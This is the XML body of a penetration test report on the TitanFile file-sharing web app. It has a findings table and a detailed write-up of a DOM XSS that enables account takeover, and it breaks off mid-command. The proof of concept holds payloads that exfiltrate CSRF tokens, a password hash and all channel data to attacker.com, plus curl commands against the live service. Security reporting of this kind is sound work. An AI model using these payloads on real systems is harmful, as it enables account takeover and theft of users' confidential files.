        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>WOPI File Access Token IDOR → Cross-Tenant Document Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8.1</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VULN-015</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSP form-action * + HTML Injection → CSRF Token Theft Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.8</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VULN-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSP unsafe-inline + unsafe-eval on Authenticated Pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.6</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VULN-013</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stored XSS via Unsanitized File Preview (Standalone)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.6</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VULN-014</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Socket Events Blindly Overwrite Permissions (Standalone)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.5</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VULN-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SAML Unsigned AuthnRequests + Wildcard DNS → Auth Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.5</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VULN-012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SAML SP Metadata Disclosure on Any Subdomain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.5</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VULN-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSP form-action Wildcard → Form Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.4</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VULN-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client-Side Permission Model Sent as Socket Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.2</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VULN-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Missing Authorization on User Impersonation Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VULN-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Unescaped Error Messages → Reflected DOM XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VULN-011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Full Client-Side Source Code Exposed (46 Files)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1008"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Total: 3 CRITICAL + 12 HIGH = 15 findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-001: DOM XSS via Unsanitized HTML Injection in File Previewer Leading to Account Takeover</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CRITICAL</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9.3 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N)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CWE-79 (Improper Neutralization of Input During Web Page Generation)</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A03:2021 — Injection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https://app.titanfile.com/static/js/views/previewer.js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File preview rendering engine — onRender() method</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file previewer component in TitanFile's web application renders HTML content directly into the DOM without any sanitization or encoding. When a user previews a file, the HTML content is injected using jQuery's .html() method, which parses and executes any embedded JavaScript. Combined with the application's permissive Content Security Policy (unsafe-inline + unsafe-eval) and dynamic OAuth2 redirect URI handling, this vulnerability enables a complete account takeover attack chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Confidentiality: CRITICAL — Attacker can access all victim's channels, files, contacts, and messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Integrity: CRITICAL — Attacker can modify, delete, or upload files as the victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Availability: LOW — Attacker can lock victim out by changing credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Affected Users: All authenticated users who preview shared files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Data at Risk: Confidential legal documents, financial records, government files exchanged by enterprise customers (Foley &amp; Lardner, Gowling WLG, RBC Bank, NSUARB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The vulnerability exists in /static/js/views/previewer.js at line 21. The onRender method of the previewer Backbone/Marionette view takes an html option and passes it directly to jQuery's .html() function:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>// Source: https://app.titanfile.com/static/js/views/previewer.js (Line 21)</w:t>
        <w:br/>
        <w:t>onRender: function () {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  this.$('#previewer').html(this.options.html);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>jQuery's .html() parses the input as HTML and inserts it into the DOM, executing any &lt;script&gt; tags, inline event handlers (onerror, onload, etc.), and other JavaScript-executing HTML constructs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This sink is exploitable because: (1) No input sanitization — the html value is not passed through any sanitization library. (2) No output encoding. (3) CSP does not block execution — authenticated page CSP includes unsafe-inline and unsafe-eval. (4) File previews are a natural attack surface — users routinely preview files shared by others.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Verify the vulnerable source code is accessible:</w:t>
        <w:br/>
        <w:t>GET /static/js/views/previewer.js → HTTP 200</w:t>
        <w:br/>
        <w:t>Line 21: this.$('#previewer').html(this.options.html);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://app.titanfile.com/static/js/views/previewer.js" | grep -n "\.html("</w:t>
        <w:br/>
        <w:t>21:    this.$('#previewer').html(this.options.html);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:t>Verify CSP allows inline script execution on authenticated pages:</w:t>
        <w:br/>
        <w:t>CSP header contains: script-src 'self' ... 'unsafe-inline' 'unsafe-eval'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://app.titanfile.com/" | grep "script-src"</w:t>
        <w:br/>
        <w:t>script-src 'self' js.stripe.com *.google.com *.gstatic.com ... 'unsafe-inline' 'unsafe-eval'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:t>Verify OAuth redirect_uri changes per subdomain (enables code theft):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://evil-attacker.titanfile.com/login/google-oauth2/" | grep location</w:t>
        <w:br/>
        <w:t>location: https://accounts.google.com/o/oauth2/auth?...redirect_uri=https://evil-attacker.titanfile.com/complete/google-oauth2/...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7: </w:t>
      </w:r>
      <w:r>
        <w:t>Full exploit: Attacker uploads file with crafted HTML → victim previews → XSS fires → redirects to OAuth on attacker subdomain → steals auth code → account takeover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Malicious HTML payload that would execute when a victim previews the attacker's shared file:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;!-- Malicious HTML payload that executes via the previewer --&gt;</w:t>
        <w:br/>
        <w:t>&lt;div id="preview-content"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;h1&gt;Loading document preview...&lt;/h1&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;img src=x onerror="</w:t>
        <w:br/>
        <w:t xml:space="preserve">    // Redirect to OAuth flow on attacker-controlled subdomain</w:t>
        <w:br/>
        <w:t xml:space="preserve">    window.location='https://evil-attacker.titanfile.com/login/google-oauth2/';</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "&gt;</w:t>
        <w:br/>
        <w:t>&lt;/div&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Alternative payloads: --&gt;</w:t>
        <w:br/>
        <w:t>&lt;!-- Steal CSRF token: --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="fetch('https://attacker.com/log?csrf='+djangoVars.csrfToken)"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Steal Credeon password hash from global scope: --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="fetch('https://attacker.com/log?pw='+TitanFile.credeonpw)"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Read all channels via Socket.IO: --&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  socket.emit('channels:search', {query:'*',paginate_by:100,search_in:'all'},</w:t>
        <w:br/>
        <w:t xml:space="preserve">    function(err,data){ fetch('https://attacker.com/exfil',</w:t>
        <w:br/>
        <w:t xml:space="preserve">      {method:'POST',body:JSON.stringify(data)}) });</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Request — Verify vulnerable file (June 11, 2026):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s -o /dev/null -w "%{http_code}" "https://app.titanfile.com/static/js/views/previewer.js"</w:t>
        <w:br/>
        <w:t>200</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s "https://app.titanfile.com/static/js/views/previewer.js"</w:t>
        <w:br/>
        <w:t>define([</w:t>
        <w:br/>
        <w:t xml:space="preserve">  'backbone.marionette',</w:t>
        <w:br/>
        <w:t>], function (Marionette) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return Marionette.ItemView.extend({</w:t>
        <w:br/>
        <w:t xml:space="preserve">    template: '#previewer-template',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    className: 'previewer-wrap',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ui: { previewer: '#previewer' },</w:t>
        <w:br/>
        <w:t xml:space="preserve">    onRender: function () {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      this.$('#previewer').html(this.options.html);   // VULNERABLE SINK</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Request — Verify CSP allows exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://app.titanfile.com/" | grep "script-src"</w:t>
        <w:br/>
        <w:t>script-src 'self' js.stripe.com *.google.com *.gstatic.com appsforoffice.microsoft.com</w:t>
        <w:br/>
